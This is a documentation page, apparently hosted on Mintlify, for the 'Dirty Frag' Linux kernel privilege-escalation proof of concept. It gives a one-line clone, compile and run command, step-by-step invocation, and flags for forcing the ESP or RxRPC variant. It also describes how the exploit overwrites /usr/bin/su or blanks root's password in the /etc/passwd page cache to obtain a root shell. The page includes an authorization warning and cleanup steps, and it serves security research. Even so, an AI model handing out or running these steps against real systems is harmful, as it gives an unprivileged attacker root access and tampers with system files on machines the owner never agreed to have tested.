Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/V4bel/dirtyfrag/llms.txt

Use this file to discover all available pages before exploring further.

The Dirty Frag PoC is a single C file (exp.c) that compiles with one gcc command and runs as an unprivileged user. It automatically tries the ESP variant first, then falls back to the RxRPC variant, and drops you into a root shell on either path. This page covers compilation, invocation options, and mandatory cleanup.
Run this exploit only on systems you are authorized to test. After execution, the page cache is contaminated — /usr/bin/su or /etc/passwd in RAM will contain attacker-written bytes until the cache is cleared or the system is rebooted. Unauthorized use is illegal.

Prerequisites

  • A Linux system running a vulnerable kernel (ESP path: kernel cac2661c53f3 – present; RxRPC path: kernel 2dc334f1a63a – present and rxrpc.ko loadable)
  • gcc installed
  • A terminal session running as an unprivileged user — the exploit escalates to root itself; you do not start as root
  • git available to clone the repository

One-liner

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Step-by-step

1

Clone the repository

git clone https://github.com/V4bel/dirtyfrag.git
cd dirtyfrag
2

Compile with gcc

Use the exact flags from the README. -O0 disables optimizations so the compiler does not reorder the splice/vmsplice sequence; -lutil links posix_openpt for the PTY bridge.
gcc -O0 -Wall -o exp exp.c -lutil
3

Run the exploit as an unprivileged user

./exp
The binary first tries the ESP variant, then falls back to the RxRPC variant automatically. You do not need to choose.
4

ESP variant succeeds: patched /usr/bin/su gives a root shell

If the ESP path works, the exploit overwrites the first 192 bytes of /usr/bin/su in the page cache with a minimal root-shell ELF. When execve("/usr/bin/su") runs, the kernel maps the patched page. Because /usr/bin/su carries the setuid bit, the process gains euid=0 immediately and executes /bin/sh.You land in a root shell.
5

ESP variant fails: RxRPC variant patches /etc/passwd

If the ESP path fails (for example, because AppArmor blocks unprivileged user namespace creation), the exploit falls back to the RxRPC variant. This path does not require a user namespace.The RxRPC variant uses three in-place pcbc(fcrypt) decryption STOREs to rewrite the root entry in the /etc/passwd page cache so that the password field is empty. PAM pam_unix.so’s nullok option then accepts an empty password for root.Run su - with no password input to get a root shell:
su -
# Press Enter when prompted for a password
The exploit’s PTY bridge handles this automatically — you do not need to type anything.
6

Cleanup: clear the contaminated page cache

After you finish, the page cache still holds the modified bytes. Clear it before continuing to use the system:
echo 3 > /proc/sys/vm/drop_caches
Or reboot:
reboot
See the Cleanup section below for details.

Options and environment variables

Verbose output

Set DIRTYFRAG_VERBOSE=1 to print detailed progress to stderr. This shows namespace setup, XFRM SA registration, splice results, and the post-write byte verification: 
DIRTYFRAG_VERBOSE=1 ./exp
You can also pass -v or --verbose on the command line: 
./exp --verbose

Force a specific variant

By default the binary tries the ESP variant first and falls back to RxRPC. Use these flags to force a single path: 
./exp --force-esp      # run only the xfrm-ESP variant
./exp --force-rxrpc    # run only the RxRPC variant
--force-rxrpc retries the RxRPC path up to three times if the first attempt does not leave /etc/passwd in the expected state.

Other flags

Flag / env varEffect
--force-espSkip the RxRPC fallback; only attempt the ESP path
--force-rxrpcSkip the ESP attempt; only attempt the RxRPC path (retried up to 3×)
-v / --verbose / DIRTYFRAG_VERBOSE=1Enable per-step progress output to stderr
DIRTYFRAG_CORRUPT_ONLY=1Perform the page-cache write but skip spawning the root PTY

Cleanup

The page cache remains contaminated until you explicitly clear it or reboot. Any process that reads /usr/bin/su or /etc/passwd from the cache will see the modified bytes. Clear the cache immediately after you are done testing.
Two options are available: Drop the page cache (no reboot required): 
echo 3 > /proc/sys/vm/drop_caches
This tells the kernel to evict all clean page cache pages. The next access to /usr/bin/su or /etc/passwd reads the correct bytes from disk. Reboot the system: 
reboot
A full reboot clears all in-memory state. Use this if drop_caches is unavailable or you want to ensure a fully clean state.

What happens internally

The exploit chains two distinct page-cache write primitives. For a full walkthrough of the C code, see How the Dirty Frag exploit code works. ESP path — injects a 192-byte root-shell ELF into the /usr/bin/su page cache via XFRM SA STOREs. Each of 48 XFRM SAs carries 4 bytes of the ELF payload in its seq_hi field. A vmsplice + splice + splice sequence plants the /usr/bin/su page cache page into an skb frag, and esp_input() performs an in-place AEAD decryption STORE directly on that page. RxRPC path — nulls the root password field in the /etc/passwd page cache via pcbc(fcrypt) STOREs triggered through the RxRPC/rxkad handshake. An offline brute-force search over the 56-bit fcrypt key space finds three keys whose decryption outputs overwrite the password field with ::. Three kernel triggers apply the STOREs in sequence. PAM’s nullok option then accepts the empty password.

Build docs developers (and LLMs) love

Get started for freeTalk to us